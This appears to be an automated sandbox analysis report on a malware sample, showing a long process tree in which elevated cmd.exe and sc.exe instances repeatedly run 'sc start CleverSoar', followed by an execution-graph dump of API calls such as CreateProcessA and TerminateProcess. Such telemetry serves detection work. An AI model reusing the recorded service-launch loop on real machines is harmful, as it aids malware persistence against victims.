                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:50
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:51
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:52
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:53
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:54
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:55
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:56
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:57
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:58
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:59
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:60
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:61
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:62
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:63
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:64
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:65
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:66
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:67
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:68
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:69
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:70
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:71
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:72
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:73
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:74
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:75
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:76
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:77
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:78
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:79
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:80
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:81
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:82
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:83
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:84
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:85
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:86
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:87
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:88
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:89
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:90
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:91
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:92
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:93
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:94
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:95
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:96
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:97
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:98
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:99
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:100
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:101
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:102
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:103
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:104
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:105
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:106
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:107
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:108
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:1.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.8%
                              Total number of Nodes:779
                              Total number of Limit Nodes:10
                              execution_graph 100237 6c854a27 100238 6c854a5d _strlen 100237->100238 100239 6c86639e 100238->100239 100240 6c855b6f 100238->100240 100241 6c855b58 100238->100241 100245 6c855b09 _Yarn 100238->100245 100369 6c9d0130 18 API calls 2 library calls 100239->100369 100244 6c9c6a43 std::_Facet_Register 4 API calls 100240->100244 100355 6c9c6a43 100241->100355 100244->100245 100328 6c9baec0 100245->100328 100248 6c855bad std::ios_base::_Ios_base_dtor 100248->100239 100251 6c859ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100248->100251 100334 6c9c4ff0 CreateProcessA 100248->100334 100249 6c9c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100249->100251 100250 6c9baec0 2 API calls 100250->100251 100251->100239 100251->100249 100251->100250 100252 6c85a292 Sleep 100251->100252 100271 6c85e619 100251->100271 100294 6c859bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 100252->100294 100253 6c856624 100256 6c9c6a43 std::_Facet_Register 4 API calls 100253->100256 100254 6c85660d 100255 6c9c6a43 std::_Facet_Register 4 API calls 100254->100255 100262 6c8565bc _Yarn _strlen 100255->100262 100256->100262 100257 6c8561cb _strlen 100257->100239 100257->100253 100257->100254 100257->100262 100258 6c9c4ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 100258->100294 100259 6c859bbd GetCurrentProcess TerminateProcess 100259->100251 100260 6c8663b2 100370 6c8415e0 18 API calls std::ios_base::_Ios_base_dtor 100260->100370 100262->100260 100264 6c856970 100262->100264 100265 6c856989 100262->100265 100268 6c856920 _Yarn 100262->100268 100263 6c8664f8 100266 6c9c6a43 std::_Facet_Register 4 API calls 100264->100266 100267 6c9c6a43 std::_Facet_Register 4 API calls 100265->100267 100266->100268 100267->100268 100338 6c9c5960 100268->100338 100270 6c85f243 CreateFileA 100287 6c85f2a7 100270->100287 100271->100270 100272 6c8569d6 std::ios_base::_Ios_base_dtor _strlen 100272->100239 100273 6c856dd2 100272->100273 100274 6c856dbb 100272->100274 100282 6c856d69 _Yarn _strlen 100272->100282 100277 6c9c6a43 std::_Facet_Register 4 API calls 100273->100277 100276 6c9c6a43 std::_Facet_Register 4 API calls 100274->100276 100275 6c8602ca 100276->100282 100277->100282 100278 6c9c5960 104 API calls 100278->100294 100279 6c857427 100283 6c9c6a43 std::_Facet_Register 4 API calls 100279->100283 100280 6c857440 100281 6c9c6a43 std::_Facet_Register 4 API calls 100280->100281 100284 6c8573da _Yarn 100281->100284 100282->100260 100282->100279 100282->100280 100282->100284 100283->100284 100285 6c9c5960 104 API calls 100284->100285 100288 6c85748d std::ios_base::_Ios_base_dtor _strlen 100285->100288 100286 6c8602ac GetCurrentProcess TerminateProcess 100286->100275 100287->100275 100287->100286 100288->100239 100289 6c857991 100288->100289 100290 6c8579a8 100288->100290 100293 6c857940 _Yarn _strlen 100288->100293 100291 6c9c6a43 std::_Facet_Register 4 API calls 100289->100291 100292 6c9c6a43 std::_Facet_Register 4 API calls 100290->100292 100291->100293 100292->100293 100293->100260 100295 6c857de2 100293->100295 100296 6c857dc9 100293->100296 100299 6c857d7c _Yarn 100293->100299 100294->100239 100294->100251 100294->100258 100294->100259 100294->100260 100294->100278 100304 6c9c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100294->100304 100298 6c9c6a43 std::_Facet_Register 4 API calls 100295->100298 100297 6c9c6a43 std::_Facet_Register 4 API calls 100296->100297 100297->100299 100298->100299 100300 6c9c5960 104 API calls 100299->100300 100301 6c857e2f std::ios_base::_Ios_base_dtor _strlen 100300->100301 100301->100239 100302 6c8585bf 100301->100302 100303 6c8585a8 100301->100303 100312 6c858556 _Yarn _strlen 100301->100312 100306 6c9c6a43 std::_Facet_Register 4 API calls 100302->100306 100305 6c9c6a43 std::_Facet_Register 4 API calls 100303->100305 100304->100294 100305->100312 100306->100312 100307 6c858983 100310 6c9c6a43 std::_Facet_Register 4 API calls 100307->100310 100308 6c85896a 100309 6c9c6a43 std::_Facet_Register 4 API calls 100308->100309 100311 6c85891d _Yarn 100309->100311 100310->100311 100313 6c9c5960 104 API calls 100311->100313 